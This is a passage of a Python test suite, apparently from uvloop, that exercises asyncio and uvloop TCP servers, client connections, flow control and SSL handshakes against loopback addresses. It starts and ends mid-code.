self.assertEqual(sock._io_refs, 0) self.assertTrue(sock._closed) async def start_server(): nonlocal CNT CNT = 0 addrs = ('127.0.0.1', 'localhost') if not isinstance(self.loop, uvloop.Loop): # Hack to let tests run on Python 3.5.0 # (asyncio doesn't support multiple hosts in 3.5.0) addrs = '127.0.0.1' srv = await asyncio.start_server( handle_client, addrs, 0, family=socket.AF_INET, loop=self.loop) srv_socks = srv.sockets self.assertTrue(srv_socks) if self.has_start_serving(): self.assertTrue(srv.is_serving()) addr = srv_socks[0].getsockname() tasks = [] for _ in range(TOTAL_CNT): tasks.append(test_client(addr)) await asyncio.wait_for( asyncio.gather(*tasks, loop=self.loop), TIMEOUT, loop=self.loop) self.loop.call_soon(srv.close) await srv.wait_closed() # Check that the server cleaned-up proxy-sockets for srv_sock in srv_socks: self.assertEqual(srv_sock.fileno(), -1) if self.has_start_serving(): self.assertFalse(srv.is_serving()) async def start_server_sock(): nonlocal CNT CNT = 0 sock = socket.socket() sock.bind(('127.0.0.1', 0)) addr = sock.getsockname() srv = await asyncio.start_server( 
handle_client, None, None, family=socket.AF_INET, loop=self.loop, sock=sock) if self.PY37: self.assertIs(srv.get_loop(), self.loop) srv_socks = srv.sockets self.assertTrue(srv_socks) if self.has_start_serving(): self.assertTrue(srv.is_serving()) tasks = [] for _ in range(TOTAL_CNT): tasks.append(test_client(addr)) await asyncio.wait_for( asyncio.gather(*tasks, loop=self.loop), TIMEOUT, loop=self.loop) srv.close() await srv.wait_closed() # Check that the server cleaned-up proxy-sockets for srv_sock in srv_socks: self.assertEqual(srv_sock.fileno(), -1) if self.has_start_serving(): self.assertFalse(srv.is_serving()) self.loop.run_until_complete(start_server()) self.assertEqual(CNT, TOTAL_CNT) self.loop.run_until_complete(start_server_sock()) self.assertEqual(CNT, TOTAL_CNT) def test_create_server_2(self): with self.assertRaisesRegex(ValueError, 'nor sock were specified'): self.loop.run_until_complete(self.loop.create_server(object)) def test_create_server_3(self): ''' check ephemeral port can be used ''' async def start_server_ephemeral_ports(): for port_sentinel in [0, None]: srv = await self.loop.create_server( asyncio.Protocol, '127.0.0.1', port_sentinel, family=socket.AF_INET) srv_socks = srv.sockets self.assertTrue(srv_socks) if self.has_start_serving(): self.assertTrue(srv.is_serving()) host, port = srv_socks[0].getsockname() self.assertNotEqual(0, port) self.loop.call_soon(srv.close) await srv.wait_closed() # Check that the server cleaned-up proxy-sockets for srv_sock in srv_socks: self.assertEqual(srv_sock.fileno(), -1) if self.has_start_serving(): self.assertFalse(srv.is_serving()) self.loop.run_until_complete(start_server_ephemeral_ports()) def test_create_server_4(self): sock = socket.socket() sock.bind(('127.0.0.1', 0)) with sock: addr = sock.getsockname() with self.assertRaisesRegex(OSError, r"error while attempting.*\('127.*: " r"address already in use"): self.loop.run_until_complete( self.loop.create_server(object, *addr)) def test_create_server_5(self): # Test that create_server sets the TCP_IPV6ONLY flag, # so it can bind to ipv4 and ipv6 addresses # simultaneously. port = tb.find_free_port() async def runner(): srv = await self.loop.create_server( asyncio.Protocol, None, port) srv.close() await srv.wait_closed() self.loop.run_until_complete(runner()) def test_create_server_6(self): if not hasattr(socket, 'SO_REUSEPORT'): raise unittest.SkipTest( 'The system does not support SO_REUSEPORT') if sys.version_info[:3] < (3, 5, 1): raise unittest.SkipTest( 'asyncio in CPython 3.5.0 does not have the ' 'reuse_port argument') port = tb.find_free_port() async def runner(): srv1 = await self.loop.create_server( asyncio.Protocol, None, port, reuse_port=True) srv2 = await self.loop.create_server( asyncio.Protocol, None, port, reuse_port=True) srv1.close() srv2.close() await srv1.wait_closed() await srv2.wait_closed() self.loop.run_until_complete(runner()) def test_create_server_7(self): # Test that create_server() stores a hard ref to the server object # somewhere in the loop. In asyncio it so happens that # loop.sock_accept() has a reference to the server object so it # never gets GCed. 
class Proto(asyncio.Protocol): def connection_made(self, tr): self.tr = tr self.tr.write(b'hello') async def test(): port = tb.find_free_port() srv = await self.loop.create_server(Proto, '127.0.0.1', port) wsrv = weakref.ref(srv) del srv gc.collect() gc.collect() gc.collect() s = socket.socket(socket.AF_INET) with s: s.setblocking(False) await self.loop.sock_connect(s, ('127.0.0.1', port)) d = await self.loop.sock_recv(s, 100) self.assertEqual(d, b'hello') srv = wsrv() srv.close() await srv.wait_closed() del srv # Let all transports shutdown. await asyncio.sleep(0.1, loop=self.loop) gc.collect() gc.collect() gc.collect() self.assertIsNone(wsrv()) self.loop.run_until_complete(test()) def test_create_server_8(self): if self.implementation == 'asyncio' and not self.PY37: raise unittest.SkipTest() with self.assertRaisesRegex( ValueError, 'ssl_handshake_timeout is only meaningful'): self.loop.run_until_complete( self.loop.create_server( lambda: None, host='::', port=0, ssl_handshake_timeout=10)) def test_create_server_9(self): if not self.has_start_serving(): raise unittest.SkipTest() async def handle_client(reader, writer): pass async def start_server(): srv = await asyncio.start_server( handle_client, '127.0.0.1', 0, family=socket.AF_INET, loop=self.loop, start_serving=False) await srv.start_serving() self.assertTrue(srv.is_serving()) # call start_serving again await srv.start_serving() self.assertTrue(srv.is_serving()) srv.close() await srv.wait_closed() self.assertFalse(srv.is_serving()) self.loop.run_until_complete(start_server()) def test_create_server_10(self): if not self.has_start_serving(): raise unittest.SkipTest() async def handle_client(reader, writer): pass async def start_server(): srv = await asyncio.start_server( handle_client, '127.0.0.1', 0, family=socket.AF_INET, loop=self.loop, start_serving=False) async with srv: fut = asyncio.ensure_future(srv.serve_forever(), loop=self.loop) await asyncio.sleep(0, loop=self.loop) self.assertTrue(srv.is_serving()) fut.cancel() with self.assertRaises(asyncio.CancelledError): await fut self.assertFalse(srv.is_serving()) self.loop.run_until_complete(start_server()) def test_create_connection_open_con_addr(self): async def client(addr): reader, writer = await asyncio.open_connection( *addr, loop=self.loop) writer.write(b'AAAA') self.assertEqual(await reader.readexactly(2), b'OK') re = r'(a bytes-like object)|(must be byte-ish)' with self.assertRaisesRegex(TypeError, re): writer.write('AAAA') writer.write(b'BBBB') self.assertEqual(await reader.readexactly(4), b'SPAM') if self.implementation == 'uvloop': tr = writer.transport sock = tr.get_extra_info('socket') self.assertTrue( sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)) writer.close() self._test_create_connection_1(client) def test_create_connection_open_con_sock(self): async def client(addr): sock = socket.socket() sock.connect(addr) reader, writer = await asyncio.open_connection( sock=sock, loop=self.loop) writer.write(b'AAAA') self.assertEqual(await reader.readexactly(2), b'OK') writer.write(b'BBBB') self.assertEqual(await reader.readexactly(4), b'SPAM') if self.implementation == 'uvloop': tr = writer.transport sock = tr.get_extra_info('socket') self.assertTrue( sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)) writer.close() self._test_create_connection_1(client) def _test_create_connection_1(self, client): CNT = 0 TOTAL_CNT = 100 def server(sock): data = sock.recv_all(4) self.assertEqual(data, b'AAAA') sock.send(b'OK') data = sock.recv_all(4) self.assertEqual(data, 
b'BBBB') sock.send(b'SPAM') async def client_wrapper(addr): await client(addr) nonlocal CNT CNT += 1 def run(coro): nonlocal CNT CNT = 0 with self.tcp_server(server, max_clients=TOTAL_CNT, backlog=TOTAL_CNT) as srv: tasks = [] for _ in range(TOTAL_CNT): tasks.append(coro(srv.addr)) self.loop.run_until_complete( asyncio.gather(*tasks, loop=self.loop)) self.assertEqual(CNT, TOTAL_CNT) run(client_wrapper) def test_create_connection_2(self): sock = socket.socket() with sock: sock.bind(('127.0.0.1', 0)) addr = sock.getsockname() async def client(): reader, writer = await asyncio.open_connection( *addr, loop=self.loop) async def runner(): with self.assertRaises(ConnectionRefusedError): await client() self.loop.run_until_complete(runner()) def test_create_connection_3(self): CNT = 0 TOTAL_CNT = 100 def server(sock): data = sock.recv_all(4) self.assertEqual(data, b'AAAA') sock.close() async def client(addr): reader, writer = await asyncio.open_connection( *addr, loop=self.loop) writer.write(b'AAAA') with self.assertRaises(asyncio.IncompleteReadError): await reader.readexactly(10) writer.close() nonlocal CNT CNT += 1 def run(coro): nonlocal CNT CNT = 0 with self.tcp_server(server, max_clients=TOTAL_CNT, backlog=TOTAL_CNT) as srv: tasks = [] for _ in range(TOTAL_CNT): tasks.append(coro(srv.addr)) self.loop.run_until_complete( asyncio.gather(*tasks, loop=self.loop)) self.assertEqual(CNT, TOTAL_CNT) run(client) def test_create_connection_4(self): sock = socket.socket() sock.close() async def client(): reader, writer = await asyncio.open_connection( sock=sock, loop=self.loop) async def runner(): with self.assertRaisesRegex(OSError, 'Bad file'): await client() self.loop.run_until_complete(runner()) def test_create_connection_5(self): def server(sock): try: data = sock.recv_all(4) except ConnectionError: return self.assertEqual(data, b'AAAA') sock.send(b'OK') async def client(addr): fut = asyncio.ensure_future( self.loop.create_connection(asyncio.Protocol, *addr), loop=self.loop) await asyncio.sleep(0, loop=self.loop) fut.cancel() with self.assertRaises(asyncio.CancelledError): await fut with self.tcp_server(server, max_clients=1, backlog=1) as srv: self.loop.run_until_complete(client(srv.addr)) def test_create_connection_6(self): if self.implementation == 'asyncio' and not self.PY37: raise unittest.SkipTest() with self.assertRaisesRegex( ValueError, 'ssl_handshake_timeout is only meaningful'): self.loop.run_until_complete( self.loop.create_connection( lambda: None, host='::', port=0, ssl_handshake_timeout=10)) def test_transport_shutdown(self): CNT = 0 # number of clients that were successful TOTAL_CNT = 100 # total number of clients that test will create TIMEOUT = 5.0 # timeout for this test async def handle_client(reader, writer): nonlocal CNT data = await reader.readexactly(4) self.assertEqual(data, b'AAAA') writer.write(b'OK') writer.write_eof() writer.write_eof() await writer.drain() writer.close() CNT += 1 async def test_client(addr): reader, writer = await asyncio.open_connection( *addr, loop=self.loop) writer.write(b'AAAA') data = await reader.readexactly(2) self.assertEqual(data, b'OK') writer.close() async def start_server(): nonlocal CNT CNT = 0 srv = await asyncio.start_server( handle_client, '127.0.0.1', 0, family=socket.AF_INET, loop=self.loop) srv_socks = srv.sockets self.assertTrue(srv_socks) addr = srv_socks[0].getsockname() tasks = [] for _ in range(TOTAL_CNT): tasks.append(test_client(addr)) await asyncio.wait_for( asyncio.gather(*tasks, loop=self.loop), TIMEOUT, loop=self.loop) 
srv.close() await srv.wait_closed() self.loop.run_until_complete(start_server()) self.assertEqual(CNT, TOTAL_CNT) def test_tcp_handle_exception_in_connection_made(self): # Test that if connection_made raises an exception, # 'create_connection' still returns. # Silence error logging self.loop.set_exception_handler(lambda *args: None) fut = asyncio.Future(loop=self.loop) connection_lost_called = asyncio.Future(loop=self.loop) async def server(reader, writer): try: await reader.read() finally: writer.close() class Proto(asyncio.Protocol): def connection_made(self, tr): 1 / 0 def connection_lost(self, exc): connection_lost_called.set_result(exc) srv = self.loop.run_until_complete(asyncio.start_server( server, '127.0.0.1', 0, family=socket.AF_INET, loop=self.loop)) async def runner(): tr, pr = await asyncio.wait_for( self.loop.create_connection( Proto, *srv.sockets[0].getsockname()), timeout=1.0, loop=self.loop) fut.set_result(None) tr.close() self.loop.run_until_complete(runner()) srv.close() self.loop.run_until_complete(srv.wait_closed()) self.loop.run_until_complete(fut) self.assertIsNone( self.loop.run_until_complete(connection_lost_called)) class Test_UV_TCP(_TestTCP, tb.UVTestCase): def test_create_server_buffered_1(self): SIZE = 123123 eof = False done = False class Proto(asyncio.BaseProtocol): def connection_made(self, tr): self.tr = tr self.recvd = b'' self.data = bytearray(50) self.buf = memoryview(self.data) def get_buffer(self, sizehint): return self.buf def buffer_updated(self, nbytes): self.recvd += self.buf[:nbytes] if self.recvd == b'a' * SIZE: self.tr.write(b'hello') def eof_received(self): nonlocal eof eof = True def connection_lost(self, exc): nonlocal done done = exc async def test(): port = tb.find_free_port() srv = await self.loop.create_server(Proto, '127.0.0.1', port) s = socket.socket(socket.AF_INET) with s: s.setblocking(False) await self.loop.sock_connect(s, ('127.0.0.1', port)) await self.loop.sock_sendall(s, b'a' * SIZE) d = await self.loop.sock_recv(s, 100) self.assertEqual(d, b'hello') srv.close() await srv.wait_closed() self.loop.run_until_complete(test()) self.assertTrue(eof) self.assertIsNone(done) def test_create_server_buffered_2(self): class ProtoExc(asyncio.BaseProtocol): def __init__(self): self._lost_exc = None def get_buffer(self, sizehint): 1 / 0 def buffer_updated(self, nbytes): pass def connection_lost(self, exc): self._lost_exc = exc def eof_received(self): pass class ProtoZeroBuf1(asyncio.BaseProtocol): def __init__(self): self._lost_exc = None def get_buffer(self, sizehint): return bytearray(0) def buffer_updated(self, nbytes): pass def connection_lost(self, exc): self._lost_exc = exc def eof_received(self): pass class ProtoZeroBuf2(asyncio.BaseProtocol): def __init__(self): self._lost_exc = None def get_buffer(self, sizehint): return memoryview(bytearray(0)) def buffer_updated(self, nbytes): pass def connection_lost(self, exc): self._lost_exc = exc def eof_received(self): pass class ProtoUpdatedError(asyncio.BaseProtocol): def __init__(self): self._lost_exc = None def get_buffer(self, sizehint): return memoryview(bytearray(100)) def buffer_updated(self, nbytes): raise RuntimeError('oups') def connection_lost(self, exc): self._lost_exc = exc def eof_received(self): pass async def test(proto_factory, exc_type, exc_re): port = tb.find_free_port() proto = proto_factory() srv = await self.loop.create_server( lambda: proto, '127.0.0.1', port) try: s = socket.socket(socket.AF_INET) with s: s.setblocking(False) await self.loop.sock_connect(s, 
('127.0.0.1', port)) await self.loop.sock_sendall(s, b'a') d = await self.loop.sock_recv(s, 100) if not d: raise ConnectionResetError except ConnectionResetError: pass else: self.fail("server didn't abort the connection") return finally: srv.close() await srv.wait_closed() if proto._lost_exc is None: self.fail("connection_lost() was not called") return with self.assertRaisesRegex(exc_type, exc_re): raise proto._lost_exc self.loop.set_exception_handler(lambda loop, ctx: None) self.loop.run_until_complete( test(ProtoExc, RuntimeError, 'unhandled error .* get_buffer')) self.loop.run_until_complete( test(ProtoZeroBuf1, RuntimeError, 'unhandled error .* get_buffer')) self.loop.run_until_complete( test(ProtoZeroBuf2, RuntimeError, 'unhandled error .* get_buffer')) self.loop.run_until_complete( test(ProtoUpdatedError, RuntimeError, r'^oups$')) def test_transport_get_extra_info(self): # This tests is only for uvloop. asyncio should pass it # too in Python 3.6. fut = asyncio.Future(loop=self.loop) async def handle_client(reader, writer): with self.assertRaises(asyncio.IncompleteReadError): await reader.readexactly(4) writer.close() # Previously, when we used socket.fromfd to create a socket # for UVTransports (to make get_extra_info() work), a duplicate # of the socket was created, preventing UVTransport from being # properly closed. # This test ensures that server handle will receive an EOF # and finish the request. fut.set_result(None) async def test_client(addr): t, p = await self.loop.create_connection( lambda: asyncio.Protocol(), *addr) if hasattr(t, 'get_protocol'): p2 = asyncio.Protocol() self.assertIs(t.get_protocol(), p) t.set_protocol(p2) self.assertIs(t.get_protocol(), p2) t.set_protocol(p) self.assertFalse(t._paused) self.assertTrue(t.is_reading()) t.pause_reading() t.pause_reading() # Check that it's OK to call it 2nd time. self.assertTrue(t._paused) self.assertFalse(t.is_reading()) t.resume_reading() t.resume_reading() # Check that it's OK to call it 2nd time. self.assertFalse(t._paused) self.assertTrue(t.is_reading()) sock = t.get_extra_info('socket') self.assertIs(sock, t.get_extra_info('socket')) sockname = sock.getsockname() peername = sock.getpeername() with self.assertRaisesRegex(RuntimeError, 'is used by transport'): self.loop.add_writer(sock.fileno(), lambda: None) with self.assertRaisesRegex(RuntimeError, 'is used by transport'): self.loop.remove_writer(sock.fileno()) with self.assertRaisesRegex(RuntimeError, 'is used by transport'): self.loop.add_reader(sock.fileno(), lambda: None) with self.assertRaisesRegex(RuntimeError, 'is used by transport'): self.loop.remove_reader(sock.fileno()) self.assertEqual(t.get_extra_info('sockname'), sockname) self.assertEqual(t.get_extra_info('peername'), peername) t.write(b'OK') # We want server to fail. self.assertFalse(t._closing) t.abort() self.assertTrue(t._closing) self.assertFalse(t.is_reading()) # Check that pause_reading and resume_reading don't raise # errors if called after the transport is closed. t.pause_reading() t.resume_reading() await fut # Test that peername and sockname are available after # the transport is closed. 
self.assertEqual(t.get_extra_info('peername'), peername) self.assertEqual(t.get_extra_info('sockname'), sockname) async def start_server(): srv = await asyncio.start_server( handle_client, '127.0.0.1', 0, family=socket.AF_INET, loop=self.loop) addr = srv.sockets[0].getsockname() await test_client(addr) srv.close() await srv.wait_closed() self.loop.run_until_complete(start_server()) def test_create_server_float_backlog(self): # asyncio spits out a warning we cannot suppress async def runner(bl): await self.loop.create_server( asyncio.Protocol, None, 0, backlog=bl) for bl in (1.1, '1'): with self.subTest(backlog=bl): with self.assertRaisesRegex(TypeError, 'integer'): self.loop.run_until_complete(runner(bl)) def test_many_small_writes(self): N = 10000 TOTAL = 0 fut = self.loop.create_future() async def server(reader, writer): nonlocal TOTAL while True: d = await reader.read(10000) if not d: break TOTAL += len(d) fut.set_result(True) writer.close() async def run(): srv = await asyncio.start_server( server, '127.0.0.1', 0, family=socket.AF_INET, loop=self.loop) addr = srv.sockets[0].getsockname() r, w = await asyncio.open_connection(*addr, loop=self.loop) DATA = b'x' * 102400 # Test _StreamWriteContext with short sequences of writes w.write(DATA) await w.drain() for _ in range(3): w.write(DATA) await w.drain() for _ in range(10): w.write(DATA) await w.drain() for _ in range(N): w.write(DATA) try: w.write('a') except TypeError: pass await w.drain() for _ in range(N): w.write(DATA) await w.drain() w.close() await fut srv.close() await srv.wait_closed() self.assertEqual(TOTAL, N * 2 * len(DATA) + 14 * len(DATA)) self.loop.run_until_complete(run()) def test_tcp_handle_unclosed_gc(self): fut = self.loop.create_future() async def server(reader, writer): writer.transport.abort() fut.set_result(True) async def run(): addr = srv.sockets[0].getsockname() await asyncio.open_connection(*addr, loop=self.loop) await fut srv.close() await srv.wait_closed() srv = self.loop.run_until_complete(asyncio.start_server( server, '127.0.0.1', 0, family=socket.AF_INET, loop=self.loop)) if self.loop.get_debug(): rx = r'unclosed resource <TCP.*; ' \ r'object created at(.|\n)*test_tcp_handle_unclosed_gc' else: rx = r'unclosed resource <TCP.*' with self.assertWarnsRegex(ResourceWarning, rx): self.loop.create_task(run()) self.loop.run_until_complete(srv.wait_closed()) self.loop.run_until_complete(asyncio.sleep(0.1, loop=self.loop)) srv = None gc.collect() gc.collect() gc.collect() self.loop.run_until_complete(asyncio.sleep(0.1, loop=self.loop)) # Since one TCPTransport handle wasn't closed correctly, # we need to disable this check: self.skip_unclosed_handles_check() def test_tcp_handle_abort_in_connection_made(self): async def server(reader, writer): try: await reader.read() finally: writer.close() class Proto(asyncio.Protocol): def connection_made(self, tr): tr.abort() srv = self.loop.run_until_complete(asyncio.start_server( server, '127.0.0.1', 0, family=socket.AF_INET, loop=self.loop)) async def runner(): tr, pr = await asyncio.wait_for( self.loop.create_connection( Proto, *srv.sockets[0].getsockname()), timeout=1.0, loop=self.loop) # Asyncio would return a closed socket, which we # can't do: the transport was aborted, hence there # is no FD to attach a socket to (to make # get_extra_info() work). 
self.assertIsNone(tr.get_extra_info('socket')) tr.close() self.loop.run_until_complete(runner()) srv.close() self.loop.run_until_complete(srv.wait_closed()) def test_connect_accepted_socket_ssl_args(self): if self.implementation == 'asyncio' and not self.PY37: raise unittest.SkipTest() with self.assertRaisesRegex( ValueError, 'ssl_handshake_timeout is only meaningful'): with socket.socket() as s: self.loop.run_until_complete( self.loop.connect_accepted_socket( (lambda: None), s, ssl_handshake_timeout=10.0)) def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None): loop = self.loop class MyProto(MyBaseProto): def connection_lost(self, exc): super().connection_lost(exc) loop.call_soon(loop.stop) def data_received(self, data): super().data_received(data) self.transport.write(expected_response) lsock = socket.socket(socket.AF_INET) lsock.bind(('127.0.0.1', 0)) lsock.listen(1) addr = lsock.getsockname() message = b'test data' response = None expected_response = b'roger' def client(): nonlocal response try: csock = socket.socket(socket.AF_INET) if client_ssl is not None: csock = client_ssl.wrap_socket(csock) csock.connect(addr) csock.sendall(message) response = csock.recv(99) csock.close() except Exception as exc: print( "Failure in client thread in test_connect_accepted_socket", exc) thread = threading.Thread(target=client, daemon=True) thread.start() conn, _ = lsock.accept() proto = MyProto(loop=loop) proto.loop = loop extras = {} if server_ssl and (self.implementation != 'asyncio' or self.PY37): extras = dict(ssl_handshake_timeout=10.0) f = loop.create_task( loop.connect_accepted_socket( (lambda: proto), conn, ssl=server_ssl, **extras)) loop.run_forever() conn.close() lsock.close() thread.join(1) self.assertFalse(thread.is_alive()) self.assertEqual(proto.state, 'CLOSED') self.assertEqual(proto.nbytes, len(message)) self.assertEqual(response, expected_response) tr, _ = f.result() if server_ssl: self.assertIn('SSL', tr.__class__.__name__) tr.close() # let it close self.loop.run_until_complete(asyncio.sleep(0.1, loop=self.loop)) @unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'no Unix sockets') def test_create_connection_wrong_sock(self): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) with sock: coro = self.loop.create_connection(MyBaseProto, sock=sock) with self.assertRaisesRegex(ValueError, 'A Stream Socket was expected'): self.loop.run_until_complete(coro) @unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'no Unix sockets') def test_create_server_wrong_sock(self): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) with sock: coro = self.loop.create_server(MyBaseProto, sock=sock) with self.assertRaisesRegex(ValueError, 'A Stream Socket was expected'): self.loop.run_until_complete(coro) @unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'), 'no socket.SOCK_NONBLOCK (linux only)') def test_create_server_stream_bittype(self): sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM | socket.SOCK_NONBLOCK) with sock: coro = self.loop.create_server(lambda: None, sock=sock) srv = self.loop.run_until_complete(coro) srv.close() self.loop.run_until_complete(srv.wait_closed()) def test_flowcontrol_mixin_set_write_limits(self): async def client(addr): paused = False class Protocol(asyncio.Protocol): def pause_writing(self): nonlocal paused paused = True def resume_writing(self): nonlocal paused paused = False t, p = await self.loop.create_connection(Protocol, *addr) t.write(b'q' * 512) self.assertEqual(t.get_write_buffer_size(), 512) t.set_write_buffer_limits(low=16385) 
self.assertFalse(paused) self.assertEqual(t.get_write_buffer_limits(), (16385, 65540)) with self.assertRaisesRegex(ValueError, 'high.*must be >= low'): t.set_write_buffer_limits(high=0, low=1) t.set_write_buffer_limits(high=1024, low=128) self.assertFalse(paused) self.assertEqual(t.get_write_buffer_limits(), (128, 1024)) t.set_write_buffer_limits(high=256, low=128) self.assertTrue(paused) self.assertEqual(t.get_write_buffer_limits(), (128, 256)) t.close() with self.tcp_server(lambda sock: sock.recv_all(1), max_clients=1, backlog=1) as srv: self.loop.run_until_complete(client(srv.addr)) class Test_AIO_TCP(_TestTCP, tb.AIOTestCase): pass class _TestSSL(tb.SSLTestCase): ONLYCERT = tb._cert_fullname(__file__, 'ssl_cert.pem') ONLYKEY = tb._cert_fullname(__file__, 'ssl_key.pem') PAYLOAD_SIZE = 1024 * 100 TIMEOUT = 60 def test_create_server_ssl_1(self): CNT = 0 # number of clients that were successful TOTAL_CNT = 25 # total number of clients that test will create TIMEOUT = 10.0 # timeout for this test A_DATA = b'A' * 1024 * 1024 B_DATA = b'B' * 1024 * 1024 sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY) client_sslctx = self._create_client_ssl_context() clients = [] async def handle_client(reader, writer): nonlocal CNT data = await reader.readexactly(len(A_DATA)) self.assertEqual(data, A_DATA) writer.write(b'OK') data = await reader.readexactly(len(B_DATA)) self.assertEqual(data, B_DATA) writer.writelines([b'SP', bytearray(b'A'), memoryview(b'M')]) await writer.drain() writer.close() CNT += 1 async def test_client(addr): fut = asyncio.Future(loop=self.loop) def prog(sock): try: sock.starttls(client_sslctx) sock.connect(addr) sock.send(A_DATA) data = sock.recv_all(2) self.assertEqual(data, b'OK') sock.send(B_DATA) data = sock.recv_all(4) self.assertEqual(data, b'SPAM') sock.close() except Exception as ex: self.loop.call_soon_threadsafe(fut.set_exception, ex) else: self.loop.call_soon_threadsafe(fut.set_result, None) client = self.tcp_client(prog) client.start() clients.append(client) await fut async def start_server(): extras = {} if self.implementation != 'asyncio' or self.PY37: extras = dict(ssl_handshake_timeout=10.0) srv = await asyncio.start_server( handle_client, '127.0.0.1', 0, family=socket.AF_INET, ssl=sslctx, loop=self.loop, **extras) try: srv_socks = srv.sockets self.assertTrue(srv_socks) addr = srv_socks[0].getsockname() tasks = [] for _ in range(TOTAL_CNT): tasks.append(test_client(addr)) await asyncio.wait_for( asyncio.gather(*tasks, loop=self.loop), TIMEOUT, loop=self.loop) finally: self.loop.call_soon(srv.close) await srv.wait_closed() with self._silence_eof_received_warning(): self.loop.run_until_complete(start_server()) self.assertEqual(CNT, TOTAL_CNT) for client in clients: client.stop() def test_create_connection_ssl_1(self): if self.implementation == 'asyncio': # Don't crash on asyncio errors self.loop.set_exception_handler(None) CNT = 0 TOTAL_CNT = 25 A_DATA = b'A' * 1024 * 1024 B_DATA = b'B' * 1024 * 1024 sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY) client_sslctx = self._create_client_ssl_context() def server(sock): sock.starttls( sslctx, server_side=True) data = sock.recv_all(len(A_DATA)) self.assertEqual(data, A_DATA) sock.send(b'OK') data = sock.recv_all(len(B_DATA)) self.assertEqual(data, B_DATA) sock.send(b'SPAM') sock.close() async def client(addr): extras = {} if self.implementation != 'asyncio' or self.PY37: extras = dict(ssl_handshake_timeout=10.0) reader, writer = await asyncio.open_connection( *addr, ssl=client_sslctx, 
server_hostname='', loop=self.loop, **extras) writer.write(A_DATA) self.assertEqual(await reader.readexactly(2), b'OK') writer.write(B_DATA) self.assertEqual(await reader.readexactly(4), b'SPAM') nonlocal CNT CNT += 1 writer.close() async def client_sock(addr): sock = socket.socket() sock.connect(addr) reader, writer = await asyncio.open_connection( sock=sock, ssl=client_sslctx, server_hostname='', loop=self.loop) writer.write(A_DATA) self.assertEqual(await reader.readexactly(2), b'OK') writer.write(B_DATA) self.assertEqual(await reader.readexactly(4), b'SPAM') nonlocal CNT CNT += 1 writer.close() sock.close() def run(coro): nonlocal CNT CNT = 0 with self.tcp_server(server, max_clients=TOTAL_CNT, backlog=TOTAL_CNT) as srv: tasks = [] for _ in range(TOTAL_CNT): tasks.append(coro(srv.addr)) self.loop.run_until_complete( asyncio.gather(*tasks, loop=self.loop)) self.assertEqual(CNT, TOTAL_CNT) with self._silence_eof_received_warning(): run(client) with self._silence_eof_received_warning(): run(client_sock) def test_create_connection_ssl_slow_handshake(self): if self.implementation == 'asyncio': raise unittest.SkipTest() client_sslctx = self._create_client_ssl_context() # silence error logger self.loop.set_exception_handler(lambda *args: None) def server(sock): try: sock.recv_all(1024 * 1024) except ConnectionAbortedError: pass finally: sock.close() async def client(addr): reader, writer = await asyncio.open_connection( *addr, ssl=client_sslctx, server_hostname='', loop=self.loop, ssl_handshake_timeout=1.0) with self.tcp_server(server, max_clients=1, backlog=1) as srv: with self.assertRaisesRegex( ConnectionAbortedError, r'SSL handshake.*is taking longer'): self.loop.run_until_complete(client(srv.addr)) def test_create_connection_ssl_failed_certificate(self): if self.implementation == 'asyncio': raise unittest.SkipTest() # silence error logger self.loop.set_exception_handler(lambda *args: None) sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY) client_sslctx = self._create_client_ssl_context(disable_verify=False) def server(sock): try: sock.starttls( sslctx, server_side=True) sock.connect() except (ssl.SSLError, OSError): pass finally: sock.close() async def client(addr): reader, writer = await asyncio.open_connection( *addr, ssl=client_sslctx, server_hostname='', loop=self.loop, ssl_handshake_timeout=1.0) with self.tcp_server(server, max_clients=1, backlog=1) as srv: exc_type = ssl.SSLError if self.PY37: exc_type = ssl.SSLCertVerificationError with self.assertRaises(exc_type): self.loop.run_until_complete(client(srv.addr)) def test_start_tls_wrong_args(self): if self.implementation == 'asyncio': raise unittest.SkipTest() async def main(): with self.assertRaisesRegex(TypeError, 'SSLContext, got'): await self.loop.start_tls(None, None, None) sslctx = self._create_server_ssl_context( self.ONLYCERT, self.ONLYKEY) with self.assertRaisesRegex(TypeError, 'is not supported'): await self.loop.start_tls(None, None, sslctx) self.loop.run_until_complete(main()) def test_ssl_handshake_timeout(self): if self.implementation == 'asyncio': raise unittest.SkipTest() # bpo-29970: Check that a connection is aborted if handshake is not # completed in timeout period, instead of remaining open indefinitely client_sslctx = self._create_client_ssl_context() # silence error logger messages = [] self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx)) server_side_aborted = False def server(sock): nonlocal server_side_aborted try: sock.recv_all(1024 * 1024) except ConnectionAbortedError: 
server_side_aborted = True finally: sock.close() async def client(addr): await asyncio.wait_for( self.loop.create_connection( asyncio.Protocol, *addr, ssl=client_sslctx, server_hostname='', ssl_handshake_timeout=10.0), 0.5, loop=self.loop) with self.tcp_server(server, max_clients=1, backlog=1) as srv: with self.assertRaises(asyncio.TimeoutError): self.loop.run_until_complete(client(srv.addr)) self.assertTrue(server_side_aborted) # Python issue #23197: cancelling a handshake must not raise an # exception or log an error, even if the handshake failed self.assertEqual(messages, []) def test_ssl_connect_accepted_socket(self): server_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) server_context.load_cert_chain(self.ONLYCERT, self.ONLYKEY) if hasattr(server_context, 'check_hostname'): server_context.check_hostname = False server_context.verify_mode = ssl.CERT_NONE client_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) if hasattr(server_context, 'check_hostname'): client_context.check_hostname = False client_context.verify_mode = ssl.CERT_NONE Test_UV_TCP.test_connect_accepted_socket( self, server_context, client_context) def test_start_tls_client_corrupted_ssl(self): if self.implementation == 'asyncio': raise unittest.SkipTest() self.loop.set_exception_handler(lambda loop, ctx: None) sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY) client_sslctx = self._create_client_ssl_context() def server(sock): orig_sock = sock.dup() try: sock.starttls( sslctx, server_side=True) sock.sendall(b'A\n') sock.recv_all(1) orig_sock.send(b'please corrupt the SSL connection') except 